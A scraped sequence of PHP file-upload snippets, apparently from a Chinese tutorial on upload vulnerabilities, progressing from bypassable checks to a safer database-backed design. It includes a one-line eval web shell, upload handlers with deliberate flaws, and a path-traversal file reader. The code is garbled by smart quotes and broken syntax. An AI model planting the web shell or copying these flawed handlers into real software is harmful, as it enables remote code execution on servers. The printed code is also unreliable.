<?php$uploaddir = ‘uploads/‘; $uploadfile = $uploaddir . basename($_FILES[‘userfile‘][‘name‘]);if (move_uploaded_file($_FILES[‘userfile‘][‘tmp_name‘], $uploadfile)){    echo "File is valid, and was successfully uploaded.\n";} else {    echo "File uploading failed.\n";}?>

<form name="upload" action="upload1.php" method="POST" ENCTYPE="multipart/formdata">Select the file to upload: <input type="file" name="userfile"><input type="submit" name="upload" value="upload"></form>

<?php eval($_GET[‘command‘]);?>

<?phpif($_FILES[‘userfile‘][‘type‘] != "image/gif") {//获取Http请求头信息中ContentType    echo "Sorry, we only allow uploading GIF images";    exit;}$uploaddir = ‘uploads/‘;$uploadfile = $uploaddir.basename($_FILES[‘userfile‘][‘name‘]);if (move_uploaded_file($_FILES[‘userfile‘][‘tmp_name‘], $uploadfile)){    echo "File is valid, and was successfully uploaded.\n";} else {    echo "File uploading failed.\n";}?>

<?php$imageinfo = getimagesize($_FILES[‘userfile‘][‘tmp_name‘]);if($imageinfo[‘mime‘] != ‘image/gif‘ && $imageinfo[‘mime‘] != ‘image/jpeg‘) {    echo "Sorry, we only accept GIF and JPEG images\n";    exit;}$uploaddir = ‘uploads/‘;$uploadfile = $uploaddir . basename($_FILES[‘userfile‘][‘name‘]);if (move_uploaded_file($_FILES[‘userfile‘][‘tmp_name‘], $uploadfile)){    echo "File is valid, and was successfully uploaded.\n";} else {    echo "File uploading failed.\n";}?>

<?php$blacklist = array(".php", ".phtml", ".php3", ".php4");foreach ($blacklist as $item) {if(preg_match("/$item\$/i", $_FILES[‘userfile‘][‘name‘])) {    echo "We do not allow uploading PHP files\n";    exit;}}$uploaddir = ‘uploads/‘;$uploadfile = $uploaddir . basename($_FILES[‘userfile‘][‘name‘]);if (move_uploaded_file($_FILES[‘userfile‘][‘tmp_name‘], $uploadfile)){    echo "File is valid, and was successfully uploaded.\n";} else {    echo "File uploading failed.\n";}?>

<?php$uploaddir = ‘d:/uploads/‘;$uploadfile = $uploaddir . basename($_FILES[‘userfile‘][‘name‘]);if (move_uploaded_file($_FILES[‘userfile‘][‘tmp_name‘], $uploadfile)) {　　echo "File is valid, and was successfully uploaded.\n";} else {　　echo "File uploading failed.\n";}?>

<?php$uploaddir = ‘d:/uploads/‘;$name = $_GET[‘name‘];readfile($uploaddir.$name);?>

<?phprequire_once ‘DB.php‘;$uploaddir = ‘D:/uploads/‘; $uploadfile = tempnam($uploaddir, "upload_");if (move_uploaded_file($_FILES[‘userfile‘][‘tmp_name‘], $uploadfile)) {　　$db =& DB::connect("mysql://username:password@localhost/database");　　if(PEAR::isError($db)) {　　　　unlink($uploadfile);　　　　die "Error connecting to the database";　　}　　$res = $db->query("INSERT INTO uploads SET name=?, original_name=?,mime_type=?",
　　　　　　array(basename($uploadfile,basename($_FILES[‘userfile‘][‘name‘]),$_FILES[‘userfile‘][‘type‘]));　　if(PEAR::isError($res)) {　　　　unlink($uploadfile);　　　　die "Error saving data to the database. The file was not uploaded";　　}　　$id = $db->getOne(‘SELECT LAST_INSERT_ID() FROM uploads‘);　　echo "File is valid, and was successfully uploaded. You can view it <a href=http://www.mamicode.com/"view.php?id=$id\">here</a>\n";} else {　　echo "File uploading failed.\n";}?>

<?phprequire_once ‘DB.php‘;$uploaddir = ‘D:/uploads/‘;$id = $_GET[‘id‘];if(!is_numeric($id)) {　　die("File id must be numeric");}$db =& DB::connect("mysql://root@localhost/db");if(PEAR::isError($db)) {　　die("Error connecting to the database");}$file = $db->getRow(‘SELECT name, mime_type FROM uploads WHERE id=?‘,array($id), DB_FETCHMODE_ASSOC);if(PEAR::isError($file)) {　　die("Error fetching data from the database");}if(is_null($file) || count($file)==0) {　　die("File not found");}header("Content-Type: " . $file[‘mime_type‘]);readfile($uploaddir.$file[‘name‘]);?>